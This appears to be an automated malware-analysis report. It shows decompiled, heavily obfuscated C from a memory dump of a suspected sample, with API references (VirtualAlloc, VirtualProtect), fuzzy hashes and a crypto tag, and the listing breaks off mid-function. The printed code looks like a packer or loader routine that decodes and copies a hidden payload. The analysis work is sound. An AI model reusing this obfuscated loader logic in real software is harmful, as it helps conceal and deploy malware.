				_t75 = _t72;
				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
				_t102 = _t101 + 0xc;
				_t82 = _t81 + _t68;
				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
					_push(0);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t82 = _t82; // executed
					_t52 = E00EA5F16(_t51, _t60, 0, _t75, _t82, _t89); // executed
					_push(_t52);
					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
					_t54 = _t52;
					_t51 = E00EA8F3B(_t54, _t60, 0, _t75, _t82, _t89);
				}
				 *(_t99 - 4) = _t82;
				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
				 *_t41 =  *(_t60 + 0x41d140);
				_t78 =  *(_t99 - 8);
				_push(_t89);
				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
				asm("popad");
				return _t51;
			}

0x00ea709d
0x00ea709d
0x00ea709d
0x00ea709d
0x00ea709e
0x00ea70a5
0x00ea70ab
0x00ea70ae
0x00ea70af
0x00ea70b2
0x00ea70b6
0x00ea70ba
0x00ea70c1
0x00ea70cb
0x00ea70d0
0x00ea70d0
0x00ea70d6
0x00ea70dd
0x00ea70e0
0x00ea70e3
0x00ea70e9
0x00ea70f5
0x00ea70fc
0x00ea7102
0x00ea710a
0x00ea710c
0x00ea7112
0x00ea7119
0x00ea711d
0x00ea712b
0x00ea712b
0x00ea7135
0x00ea7138
0x00ea7138
0x00ea713e
0x00ea7146
0x00ea714a
0x00ea714b
0x00ea7153
0x00ea7157
0x00ea7158
0x00ea715d
0x00ea7163
0x00ea7166
0x00ea7169
0x00ea716c
0x00ea7179
0x00ea717d
0x00ea717f
0x00ea7181
0x00ea7182
0x00ea7184
0x00ea718e
0x00ea7191
0x00ea7191
0x00ea719d
0x00ea719e
0x00ea719e
0x00ea719e
0x00ea71a6
0x00ea71a8
0x00ea71b0
0x00ea71b4
0x00ea71b5
0x00ea71ba
0x00ea71c2
0x00ea71c6
0x00ea71c7
0x00ea71c7
0x00ea71cc
0x00ea71e0
0x00ea71ea
0x00ea71f0
0x00ea71f1
0x00ea71f7
0x00ea71fb
0x00ea71ff
0x00ea7201

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 00EA70D0
VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 00EA7138

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction ID: 32973d40df18bf75571b1e4c032a42642bb050033df7e87779baabdec4d03981
Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
Instruction Fuzzy Hash: CF414E72908204EFEB049F54CC85BAEBBF5EF88710F15849DED88AB246C77429509B69

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00EA1B1E, Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00EA1B1E(void* __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t58;
				signed int _t60;
				void* _t77;
				void* _t89;
				void* _t90;
				signed int _t91;
				void* _t95;
				signed int _t96;
				signed int _t97;
				signed int _t101;
				signed int _t105;
				signed int _t106;

				_t89 = __ebx;
				_t58 = E00EA2467(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x41c395)),  *((intOrPtr*)(__ebx + 0x41c290)),  *((intOrPtr*)(__ebx + 0x41c3b1)));
				if(_t58 < 0xda63) {
					_t58 = (_t58 & 0x00000000) - 0xffffffff;
				} else {
					_a8 = _a8 & 0xffffffff;
					_t105 = _t105 ^  *(__ebx + 0x41c8a6);
				}
				_t106 = _t105 | _t101;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) - 1;
				_v12 = _v12 - 1;
				_t60 = _t58 & 0x00000000;
				_t96 = _t95 - _t60;
				if(_a4 < 0x7e4d) {
					_v16 = 0x581;
					 *(_t89 + 0x41c8a6) = 0xffffffff;
					_t97 = 1;
				} else {
					_t97 = _t96 ^ 0x00000034;
					_a4 = _a4 ^ 0xffffffff;
				}
				_t91 = _t90 - 0xffffffff;
				if(_t60 - 1 >= 0x60f9) {
					 *(_t89 + 0x41c8a6) = 1;
					_v16 = _v16 + 0xfffffe47;
				} else {
					_t106 =  *(_t89 + 0x41c8a6);
				}
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + _t101;
				_v8 = _v8 | _t101;
				_v8 = _v8 - 1;
				_v12 = _v12 ^ 0x00000000;
				 *(_t89 + 0x41c8a6) = 0xfffff898;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) - 1;
				_v16 = 1;
				_a4 = (_t106 + 0x00000001 - 0x00000001 & 0x00000000) + 1;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + (_t91 ^ _t97 & 0x00000000) + 1 + _v12;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + 1;
				_v8 = 1;
				_t77 = E00EA9159(_v16, _t89, (_t106 + 0x00000001 - 0x00000001 & 0x00000000) + 1);
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) + 1;
				_a4 = _a4 + (_t77 + 0x00000001 - 0x00000001 ^ 0x310) + 0xffffffff;
				 *(_t89 + 0x41c8a6) =  *(_t89 + 0x41c8a6) | 0x00000316;
				return 0xfffffffffffff815;
			}

0x00ea1b1e
0x00ea1b3b
0x00ea1b45
0x00ea1b58
0x00ea1b47
0x00ea1b47
0x00ea1b4b
0x00ea1b4b
0x00ea1b64
0x00ea1b66
0x00ea1b6c
0x00ea1b70
0x00ea1b75
0x00ea1b7e
0x00ea1b89
0x00ea1b90
0x00ea1b9a
0x00ea1b80
0x00ea1b80
0x00ea1b83
0x00ea1b83
0x00ea1b9f
0x00ea1ba8
0x00ea1bb7
0x00ea1bc1
0x00ea1baa
0x00ea1baa
0x00ea1bb0
0x00ea1be4
0x00ea1bfe
0x00ea1c01
0x00ea1c0c
0x00ea1c1c
0x00ea1c29
0x00ea1c3c
0x00ea1c44
0x00ea1c47
0x00ea1c4d
0x00ea1c56
0x00ea1c5e
0x00ea1c74
0x00ea1c91
0x00ea1cb3
0x00ea1ccd

Strings

M~, xrefs: 00EA1B77

Memory Dump Source

Source File: 00000001.00000002.699168037.0000000000EA0000.00000040.00000001.sdmp, Offset: 00EA0000, based on PE: true

Similarity

API ID:
String ID: M~
API String ID: 0-3014885260
Opcode ID: 12ddc3b1168ff52f07e762c651a63c9af5d943a6ffcb7562eca4daf5dfd61062
Instruction ID: 4a718a25740a86f9305e6ce39b2fb65dfb783233218b44cfa3ed09853b4bc202
Opcode Fuzzy Hash: 12ddc3b1168ff52f07e762c651a63c9af5d943a6ffcb7562eca4daf5dfd61062
Instruction Fuzzy Hash: C841D773810A059FEB00DE7CCCC97CA3A61EF85335F1883A69C399E1D9D33896558B68

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3A14, Relevance: .9, Instructions: 925
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00EA3A14(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _t498;
				signed int _t503;
				void* _t505;
				void* _t506;
				signed int _t510;
				signed int _t513;
				signed int _t516;
				signed int _t521;
				void* _t523;
				void* _t525;
				intOrPtr _t526;
				void _t529;
				signed int _t533;
				intOrPtr _t539;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t554;
				void* _t556;
				signed int _t557;
				void* _t560;
				signed int _t565;
				signed int _t566;
				signed int _t569;
				void* _t573;
				void* _t575;
				signed int _t576;
				signed int _t579;
				intOrPtr _t581;
				signed int _t587;
				signed int _t589;
				void* _t592;
				void* _t594;
				signed int _t595;
				void* _t599;
				void* _t601;
				intOrPtr _t602;
				void* _t605;
				void* _t607;
				void* _t608;
				signed int _t613;
				signed int _t614;
				void* _t616;
				void* _t618;
				signed int _t623;
				void* _t625;
				signed int _t626;
				signed int _t629;
				signed int _t637;
				void* _t639;
				void* _t641;
				void* _t642;
				signed int _t645;
				signed int _t648;
				signed int _t660;
				signed int _t663;
				signed int _t665;
				signed int _t672;
				signed int _t675;
				signed int _t677;
				signed int _t679;
				signed int _t682;
				void* _t685;
				signed int _t692;
				signed int _t693;
				signed int _t702;
				signed int _t704;
				signed int _t706;
				signed int _t708;
				signed int _t712;
				signed int _t714;
				signed int _t717;
				signed int _t720;
				void* _t723;
				signed int _t725;
				signed int _t727;
				signed int _t730;
				signed int _t731;
				signed int _t733;
				signed int _t740;
				signed int _t741;
				signed int _t746;
				signed int _t749;
				signed int _t751;
				signed int _t753;
				signed int _t755;
				signed int _t758;
				signed int _t761;
				signed int _t765;
				signed int _t769;
				signed int _t774;
				signed int _t779;
				signed int _t784;
				signed int _t787;
				signed int _t790;
				signed int _t792;
				signed int _t795;
				signed int _t798;
				void* _t803;
				void* _t810;
				signed int _t812;
				signed int _t815;
				signed int _t820;
				signed int _t823;
				signed int _t825;
				signed int _t828;
				signed int _t834;
				signed int _t839;
				void* _t840;
				signed int _t844;
				signed int _t849;
				void* _t851;
				signed int _t853;
				signed int _t856;
				signed int _t859;
				signed int _t863;
				signed int _t864;
				signed int _t867;
				signed int _t871;
				signed int _t874;
				signed int _t878;
				signed int* _t879;
				signed int* _t880;
				signed int* _t881;
				signed int* _t882;
				signed int* _t883;
				signed int* _t884;
				signed int* _t885;
				signed int* _t889;
				signed int* _t890;
				signed int* _t891;
				signed int* _t892;
				signed int* _t893;
				signed int* _t894;
				signed int* _t895;
				signed int* _t896;
				signed int* _t897;
				signed int* _t898;
				signed int* _t899;
				signed int* _t900;

				_t740 = __edx;
				_t660 = __ebx;
				_push(__edi);
				 *_t878 =  *_t878 ^ __edi;
				 *_t878 =  *_t878 | _t863;
				_t864 = _t878;
				_t879 = _t878 + 0xffffffdc;
				_push(__edi);
				 *_t879 =  *_t879 ^ __edi;
				 *_t879 =  *_t879 | __ebx;
				_push(_a8);
				_pop( *_t2);
				_push(_v40);
				_pop(_t792);
				_t675 = _v48;
				_v48 =  *((intOrPtr*)(_t792 + 0xc));
				_pop( *_t6);
				_v48 =  *((intOrPtr*)(_t792 + 4));
				_pop(_t834);
				 *_t9 = _t864;
				if(_v20 == 1) {
					_v12 = 7;
					_v16 = 1;
					_v28 = 8;
				}
				if(_v20 != 0) {
					if(_v20 != 2) {
						if(_v20 == 4) {
							_t312 = _t660 + 0x41d1be; // 0x41d1be
							_v48 = _t312;
							_t314 = _t660 + 0x41c0a8; // 0x41c0a8
							 *_t879 =  *_t879 & 0x00000000;
							 *_t879 =  *_t879 ^ _t314;
							_push( *((intOrPtr*)(_t660 + 0x41f068))(_t834, _v40));
							_pop( *_t316);
							_push(_v36);
							_pop( *_t318);
							_v12 = 1;
							_t320 = _t660 + 0x41c6f8; // 0x41c6f8
							_v36 = _v36 & 0x00000000;
							 *_t879 =  *_t879 ^ _t320;
							_t544 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36);
							_v36 = _t740;
							 *(_t660 + 0x41c674) =  *(_t660 + 0x41c674) & 0x00000000;
							 *(_t660 + 0x41c674) =  *(_t660 + 0x41c674) | _t740 ^ _v36 | _t544;
							_t769 = _v36;
							_v16 = 0x55;
							_t333 = _t660 + 0x41c356; // 0x41c356
							_v32 = _v32 & 0x00000000;
							 *_t879 =  *_t879 | _t333;
							_t546 =  *((intOrPtr*)(_t660 + 0x41f060))(_v32);
							_v40 = _t792;
							 *(_t660 + 0x41cd7d) =  *(_t660 + 0x41cd7d) & 0x00000000;
							 *(_t660 + 0x41cd7d) =  *(_t660 + 0x41cd7d) | _t792 & 0x00000000 ^ _t546;
							_t792 = _v40;
							_v28 = 2;
							_t345 = _t660 + 0x41cc3e; // 0x41cc3e
							_v40 = _v40 & 0x00000000;
							 *_t879 =  *_t879 ^ _t345;
							_t349 = _t660 + 0x41cf5b; // 0x41cf5b
							 *_t879 =  *_t879 ^ _t834;
							 *_t879 = _t349;
							_t498 =  *((intOrPtr*)(_t660 + 0x41f068))(_t834, _v40);
							_v36 = _t769;
							 *(_t660 + 0x41c1cd) =  *(_t660 + 0x41c1cd) & 0x00000000;
							 *(_t660 + 0x41c1cd) =  *(_t660 + 0x41c1cd) | _t769 & 0x00000000 | _t498;
							_t740 = _v36;
						}
					} else {
						_t221 = _t660 + 0x41cb7a; // 0x41cb7a
						_v32 = 0;
						_v48 = _v48 + _t221;
						_t224 = _t660 + 0x41c8ec; // 0x41c8ec
						_v40 = 0;
						 *_t879 =  *_t879 ^ _t224;
						_t551 =  *((intOrPtr*)(_t660 + 0x41f068))(_v40, _v32);
						 *(_t660 + 0x41c6f4) =  *(_t660 + 0x41c6f4) & 0x00000000;
						 *(_t660 + 0x41c6f4) =  *(_t660 + 0x41c6f4) ^ (_t834 & 0x00000000 | _t551);
						_t844 = _t834;
						_t232 = _t660 + 0x41c379; // 0x41c379
						_v36 = _v36 & 0x00000000;
						 *_t879 =  *_t879 + _t232;
						_t236 = _t660 + 0x41c532; // 0x41c532
						_v36 = _v36 & 0x00000000;
						 *_t879 =  *_t879 | _t236;
						_t554 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36, _v36);
						 *_t879 = _t554;
						_t242 = _t660 + 0x41d201; // 0x41d201
						 *_t879 = _t242;
						_t556 =  *((intOrPtr*)(_t660 + 0x41f060))(_v36, _v40);
						_t702 = _t675 & 0x00000000 |  *_t879;
						_t889 =  &(_t879[1]);
						 *_t889 =  *_t889 + _t792;
						_t810 = _t556;
						_t557 = _t810 + _t702;
						_t812 = 0;
						_t704 = _t702 & 0x00000000 ^ (_t557 ^  *_t889 |  *(_t660 + 0x41cc21));
						_t560 = _t557;
						if(_t704 > _t560) {
							_t246 = _t660 + 0x41c532; // 0x41c532
							 *_t889 =  *_t889 & 0x00000000;
							 *_t889 =  *_t889 | _t246;
							_t247 = _t660 + 0x41d201; // 0x41d201
							_v40 = _v40 & 0x00000000;
							 *_t889 =  *_t889 | _t247;
							_t587 =  *((intOrPtr*)(_t660 + 0x41f064))(_v40, _t740);
							 *(_t660 + 0x41d32e) =  *(_t660 + 0x41d32e) & 0x00000000;
							 *(_t660 + 0x41d32e) =  *(_t660 + 0x41d32e) | _t864 -  *_t889 ^ _t587;
							_t864 = _t864;
						}
						_t890 = _t889 - 0xfffffffc;
						 *_t890 =  *_t890 & 0x00000000;
						 *_t890 =  *_t890 |  *_t889;
						_t256 = _t660 + 0x41d01d; // 0x41d01d
						 *_t890 =  *_t890 ^ _t812;
						 *_t890 =  *_t890 | _t256;
						_t257 = _t660 + 0x41c37d; // 0x41c37d
						 *_t890 = _t257;
						_t565 =  *((intOrPtr*)(_t660 + 0x41f068))(_v32, _t812, _t740);
						_v36 = _t812;
						 *(_t660 + 0x41c9dc) =  *(_t660 + 0x41c9dc) & 0x00000000;
						 *(_t660 + 0x41c9dc) =  *(_t660 + 0x41c9dc) | _t812 & 0x00000000 | _t565;
						_t815 = _v36;
						_t566 =  *((intOrPtr*)(_t660 + 0x41f060))();
						 *_t890 =  *_t890 ^ _t844;
						 *_t890 =  *_t890 | _t566;
						_t267 = _t660 + 0x41c8c2; // 0x41c8c2
						 *_t890 =  *_t890 - _t660;
						 *_t890 =  *_t890 + _t267;
						_t268 = _t660 + 0x41c737; // 0x41c737
						 *_t890 =  *_t890 & 0x00000000;
						 *_t890 =  *_t890 ^ _t268;
						_t569 =  *((intOrPtr*)(_t660 + 0x41f068))(_t815, _t660, _t844);
						 *_t270 = _t569;
						_push(_v36);
						_pop( *_t272);
						_t891 = _t890 - 0xfffffffc;
						_v36 = _t815;
						 *(_t660 + 0x41c606) = _t569 & 0x00000000 |  *_t890;
						_t792 = _v36;
						_v12 = 3;
						_t277 = _t660 + 0x41d2fe; // 0x41d2fe
						_v32 = 0;
						 *_t891 =  *_t891 | _t277;
						_t573 =  *((intOrPtr*)(_t660 + 0x41f060))(_v32);
						 *_t891 =  *_t891 ^ _t792;
						 *_t891 =  *_t891 + _t573;
						_t281 = _t660 + 0x41d22a; // 0x41d22a
						_v40 = _v40 & 0x00000000;
						 *_t891 =  *_t891 | _t281;
						_t575 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _t792);
						_t706 = _t704 & 0x00000000 |  *_t891;
						_t879 =  &(_t891[1]);
						_v40 = _t740;
						_push(_t706 + _t575);
						_t774 = _v40;
						_pop(_t576);
						_v36 = _t576;
						_t708 = _t706 & 0x00000000 ^ (_t576 ^ _v36 |  *(_t660 + 0x41c48f));
						_t579 = _v36;
						if(_t708 > _t579) {
							_t292 = _t660 + 0x41d2fe; // 0x41d2fe
							_v40 = _v40 & 0x00000000;
							 *_t879 =  *_t879 + _t292;
							_t296 = _t660 + 0x41d22a; // 0x41d22a
							_v36 = 0;
							 *_t879 =  *_t879 ^ _t296;
							_t579 =  *((intOrPtr*)(_t660 + 0x41f064))(_v36, _v40);
						}
						 *_t879 = _t844;
						 *(_t660 + 0x41c2cf) = 0 ^ _t579;
						_t834 = 0;
						_v16 = 0x11;
						_t302 = _t660 + 0x41d09f; // 0x41d09f
						 *_t879 =  *_t879 - _t792;
						 *_t879 =  *_t879 + _t302;
						_t581 =  *((intOrPtr*)(_t660 + 0x41f060))(_t792);
						_v40 = _t708;
						 *((intOrPtr*)(_t660 + 0x41ce4e)) = _t581;
						_t675 = _v40;
						_v28 = 4;
						_t308 = _t660 + 0x41c4f7; // 0x41c4f7
						 *_t879 =  *_t879 ^ _t675;
						 *_t879 =  *_t879 + _t308;
						_t498 =  *((intOrPtr*)(_t660 + 0x41f060))(_t675);
						 *_t879 = _t774;
						 *(_t660 + 0x41c895) = 0 ^ _t498;
						_t740 = 0;
					}
					_t741 = _t740 ^ _t740;
					_v48 = _v48 - _t792;
					_v48 = _t741;
					_t357 = _t660 + 0x41c61d; // 0x41c61d
					 *_t879 =  *_t879 ^ _t834;
					 *_t879 = _t357;
					_t503 =  *((intOrPtr*)(_t660 + 0x41f060))(_t834, _t792, _t498);
					 *_t879 = _t503;
					_t360 = _t660 + 0x41cf67; // 0x41cf67
					_v40 = 0;
					 *_t879 =  *_t879 ^ _t360;
					_t505 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _v32);
					_pop( *_t364);
					_t677 = _t675 & 0x00000000 ^ _v40;
					_v40 = _t792;
					_push(_t677 + _t505);
					_t795 = _v40;
					_pop(_t506);
					_t679 = _t677 & 0x00000000 | _t864 & 0x00000000 ^  *(_t660 + 0x41c5dc);
					_t867 = _t864;
					if(_t679 > _t506) {
						_t369 = _t660 + 0x41c61d; // 0x41c61d
						_v32 = 0;
						 *_t879 =  *_t879 ^ _t369;
						_t372 = _t660 + 0x41cf67; // 0x41cf67
						_v36 = 0;
						 *_t879 =  *_t879 | _t372;
						_t539 =  *((intOrPtr*)(_t660 + 0x41f064))(_v36, _v32);
						_v32 = _t679;
						 *((intOrPtr*)(_t660 + 0x41cf4f)) = _t539;
						_t679 = _v32;
					}
					_t880 =  &(_t879[1]);
					 *_t880 = _t679;
					_t682 = 0;
					 *_t880 = _t741 & 0x00000000 |  *_t879;
					_t381 = _t660 + 0x41cef6; // 0x41cef6
					_v32 = _v32 & 0x00000000;
					 *_t880 =  *_t880 | _t381;
					_t385 = _t660 + 0x41ceb9; // 0x41ceb9
					 *_t880 =  *_t880 ^ _t867;
					 *_t880 =  *_t880 ^ _t385;
					_t510 =  *((intOrPtr*)(_t660 + 0x41f068))(_t867, _v32, _v40);
					 *(_t660 + 0x41caf5) =  *(_t660 + 0x41caf5) & 0x00000000;
					 *(_t660 + 0x41caf5) =  *(_t660 + 0x41caf5) | _t682 ^  *_t880 | _t510;
					_t685 = _t682;
					_t881 = _t880 - 0xfffffffc;
					_t746 = _t510 % _v28;
					 *_t881 =  *_t881 & 0x00000000;
					 *_t881 =  *_t881 | _t746;
					_t397 = _t660 + 0x41c52d; // 0x41c52d
					_v40 = 0;
					 *_t881 =  *_t881 ^ _t397;
					_t513 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40, _t685);
					 *(_t660 + 0x41d106) =  *(_t660 + 0x41d106) & 0x00000000;
					 *(_t660 + 0x41d106) =  *(_t660 + 0x41d106) | _t746 & 0x00000000 | _t513;
					_t749 = _t746;
					_t751 = _t749 & 0x00000000 ^  *_t881;
					_t882 = _t881 - 0xfffffffc;
					_v8 = _v8 - _t751;
					_v40 = 0;
					 *_t882 =  *_t882 | _t751;
					_t409 = _t660 + 0x41c7ee; // 0x41c7ee
					 *_t882 =  *_t882 ^ _t795;
					 *_t882 =  *_t882 ^ _t409;
					_t410 = _t660 + 0x41c513; // 0x41c513
					_v36 = 0;
					 *_t882 =  *_t882 | _t410;
					_t516 =  *((intOrPtr*)(_t660 + 0x41f068))(_v36, _t795, _v40, _t685);
					_v36 = _t834;
					 *(_t660 + 0x41c2a8) =  *(_t660 + 0x41c2a8) & 0x00000000;
					 *(_t660 + 0x41c2a8) =  *(_t660 + 0x41c2a8) ^ _t834 & 0x00000000 ^ _t516;
					_t753 =  *_t882;
					_t883 =  &(_t882[1]);
					_v32 = _t516;
					_v24 = _v24 & 0x00000000;
					_v24 = _v24 | _t516 ^ _v32 ^ _t753;
					_t427 = _t660 + 0x41ccc7; // 0x41ccc7
					_v40 = 0;
					 *_t883 =  *_t883 | _t427;
					_t521 =  *((intOrPtr*)(_t660 + 0x41f060))(_v40);
					 *(_t660 + 0x41cca4) =  *(_t660 + 0x41cca4) & 0x00000000;
					 *(_t660 + 0x41cca4) =  *(_t660 + 0x41cca4) | _t795 -  *_t883 | _t521;
					_t798 = _t795;
					_t839 = _v36 & 0x00000000 ^ _t660 & 0x00000000 ^ _a4;
					_t663 = _t660;
					_t436 = _t663 + 0x41c550; // 0x41c550
					_v36 = 0;
					 *_t883 =  *_t883 + _t436;
					_t523 =  *((intOrPtr*)(_t663 + 0x41f060))(_v36);
					_v36 = 0;
					 *_t883 =  *_t883 + _t523;
					_t442 = _t663 + 0x41d34c; // 0x41d34c
					 *_t883 = _t442;
					_t525 =  *((intOrPtr*)(_t663 + 0x41f060))(_v36, _v36);
					_t884 = _t883 - 0xfffffffc;
					 *_t445 = _t525;
					_v40 = _v40 + (0 ^  *_t883);
					_push(_v40);
					_pop(_t526);
					_t755 = _t753;
					_v32 = _t755;
					_t758 = _v32;
					if( *((intOrPtr*)(_t663 + 0x41ccf8)) > _t526) {
						_t452 = _t663 + 0x41c550; // 0x41c550
						_v32 = _v32 & 0x00000000;
						 *_t884 =  *_t884 + _t452;
						_t456 = _t663 + 0x41d34c; // 0x41d34c
						_v32 = _v32 & 0x00000000;
						 *_t884 =  *_t884 + _t456;
						_t526 =  *((intOrPtr*)(_t663 + 0x41f064))(_v32, _v32);
					}
					_v40 = _t758;
					 *((intOrPtr*)(_t663 + 0x41ce46)) = _t526;
					_t761 = _v40;
					_v32 = _t761;
					_t466 = _t663 + 0x41cb9d; // 0x41cb9d
					 *_t884 =  *_t884 - _t839;
					 *_t884 =  *_t884 | _t466;
					_t467 = _t663 + 0x41cd17; // 0x41cd17
					_v36 = _v36 & 0x00000000;
					 *_t884 =  *_t884 | _t467;
					_t529 =  *((intOrPtr*)(_t663 + 0x41f068))(_v36, _t839);
					 *_t884 = _t798 & 0x00000000 | _t761 & 0x00000000 ^ _t839;
					 *(_t663 + 0x41d015) = 0 ^ _t529;
					_t803 = 0;
					_t840 = _t839 - 1;
					_v32 = 0;
					_push(_v32);
					 *_t884 =  *_t884 | _t663;
					do {
						 *_t475 = _t803;
						_push(_v36);
						_pop(_t692);
						_t693 = _t692 & _v12;
						if(_t693 == 0) {
							_t840 = _t840 + 1;
							_t529 = _t529 & 0x00000000 ^ (_t803 -  *_t884 | _v28);
							_t803 = _t803;
							_t663 =  *(_t529 + _t840) & 0x000000ff;
						}
						_push(_v16);
						_pop( *_t481);
						_push(_v36);
						_pop(_t765);
						asm("rol edx, cl");
						asm("lodsb");
						_t529 = _t529 | _t765 & _t663;
						 *_t803 = _t529;
						_t803 = _t803 + 1;
						_t483 =  &_v8;
						 *_t483 = _v8 - 1;
					} while ( *_t483 != 0);
					_t665 =  *_t884;
					_t885 =  &(_t884[1]);
					_t485 = _t665 + 0x41cc0b; // 0x41cc0b
					 *_t885 =  *_t885 & 0x00000000;
					 *_t885 =  *_t885 ^ _t485;
					_t486 = _t665 + 0x41cbd0; // 0x41cbd0
					 *_t885 =  *_t885 & 0x00000000;
					 *_t885 =  *_t885 | _t486;
					_t533 =  *((intOrPtr*)(_t665 + 0x41f068))(_t867, _t693);
					_v36 = _t693;
					 *(_t665 + 0x41d326) =  *(_t665 + 0x41d326) & 0x00000000;
					 *(_t665 + 0x41d326) =  *(_t665 + 0x41d326) ^ (_t693 ^ _v36 | _t533);
					_v32 = _t665;
					return memcpy(_t803, _t840 + 1, _v24);
				} else {
					_pop( *_t15);
					_t672 = _t660 & 0x00000000 ^ _v32;
					_t17 = _t672 + 0x41cb24; // 0x41cb24
					_v32 = 0;
					 *_t879 =  *_t879 | _t17;
					_t589 =  *((intOrPtr*)(_t672 + 0x41f060))(_v32);
					 *(_t672 + 0x41c76e) =  *(_t672 + 0x41c76e) & 0x00000000;
					 *(_t672 + 0x41c76e) =  *(_t672 + 0x41c76e) ^ _t792 ^ _v48 ^ _t589;
					_t820 = _t792;
					_t25 = _t672 + 0x41c2ba; // 0x41c2ba
					_v48 = _v48 ^ _t820;
					_v48 = _t25;
					_t26 = _t672 + 0x41d1a6; // 0x41d1a6
					 *_t879 =  *_t879 ^ _t820;
					 *_t879 =  *_t879 + _t26;
					_t592 =  *((intOrPtr*)(_t672 + 0x41f060))(_t820, _t820);
					 *_t879 =  *_t879 - _t864;
					 *_t879 =  *_t879 + _t592;
					_t28 = _t672 + 0x41c035; // 0x41c035
					 *_t879 =  *_t879 & 0x00000000;
					 *_t879 =  *_t879 | _t28;
					_t594 =  *((intOrPtr*)(_t672 + 0x41f060))(_t740, _t864);
					_t712 =  *_t879;
					_t892 =  &(_t879[1]);
					_v40 = _t820;
					_push(_t712 + _t594);
					_t823 = _v40;
					_pop(_t595);
					_v40 = _t834;
					_t714 = _t712 & 0x00000000 ^ _t834 & 0x00000000 ^  *(_t672 + 0x41c8ae);
					_t849 = _v40;
					if(_t714 > _t595) {
						_t35 = _t672 + 0x41d1a6; // 0x41d1a6
						 *_t892 =  *_t892 & 0x00000000;
						 *_t892 =  *_t892 ^ _t35;
						_t36 = _t672 + 0x41c035; // 0x41c035
						 *_t892 = _t36;
						_t595 =  *((intOrPtr*)(_t672 + 0x41f064))(_v40, _t672);
						_push(0);
						 *_t892 = _t714;
						 *(_t672 + 0x41d244) = 0 ^ _t595;
					}
					_t893 = _t892 - 0xfffffffc;
					 *_t893 =  *_t893 - _t849;
					 *_t893 =  *_t893 ^ (_t595 & 0x00000000 |  *_t892);
					_t40 = _t672 + 0x41cd30; // 0x41cd30
					 *_t893 =  *_t893 ^ _t849;
					 *_t893 =  *_t893 + _t40;
					_t599 =  *((intOrPtr*)(_t672 + 0x41f060))(_t849, _t849);
					_v36 = 0;
					 *_t893 =  *_t893 + _t599;
					_t44 = _t672 + 0x41c116; // 0x41c116
					 *_t893 = _t44;
					_t601 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v36);
					_t894 =  &(_t893[1]);
					 *_t47 = _t601;
					_v40 = _v40 + (0 ^  *_t893);
					_push(_v40);
					_pop(_t602);
					_t851 = _t849;
					_v40 = _t740;
					_t717 = 0 ^  *(_t672 + 0x41d282);
					_t779 = _v40;
					if(_t717 > _t602) {
						_t54 = _t672 + 0x41cd30; // 0x41cd30
						_v36 = _v36 & 0x00000000;
						 *_t894 =  *_t894 + _t54;
						_t58 = _t672 + 0x41c116; // 0x41c116
						 *_t894 = _t58;
						_t602 =  *((intOrPtr*)(_t672 + 0x41f064))(_v36, _v36);
					}
					_v32 = _t779;
					 *((intOrPtr*)(_t672 + 0x41d2af)) = _t602;
					_t64 = _t672 + 0x41c00f; // 0x41c00f
					_v36 = 0;
					 *_t894 =  *_t894 | _t64;
					_t67 = _t672 + 0x41c17e; // 0x41c17e
					_v40 = _v40 & 0x00000000;
					 *_t894 =  *_t894 | _t67;
					_t605 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40, _v36);
					_v40 = 0;
					 *_t894 =  *_t894 + _t605;
					_t74 = _t672 + 0x41cf79; // 0x41cf79
					 *_t894 =  *_t894 & 0x00000000;
					 *_t894 =  *_t894 | _t74;
					_t607 =  *((intOrPtr*)(_t672 + 0x41f060))(_v40);
					 *_t76 = _t717;
					_push(_v32);
					 *_t78 = _t607;
					_v32 = _v32 + (_t717 & 0x00000000) + _v40;
					_push(_v32);
					_pop(_t608);
					_pop(_t784);
					_push( *((intOrPtr*)(_t672 + 0x41cc9b)));
					_pop( *_t83);
					_push(_v40);
					_pop(_t720);
					if(_t720 > _t608) {
						_t85 = _t672 + 0x41c17e; // 0x41c17e
						 *_t894 =  *_t894 & 0x00000000;
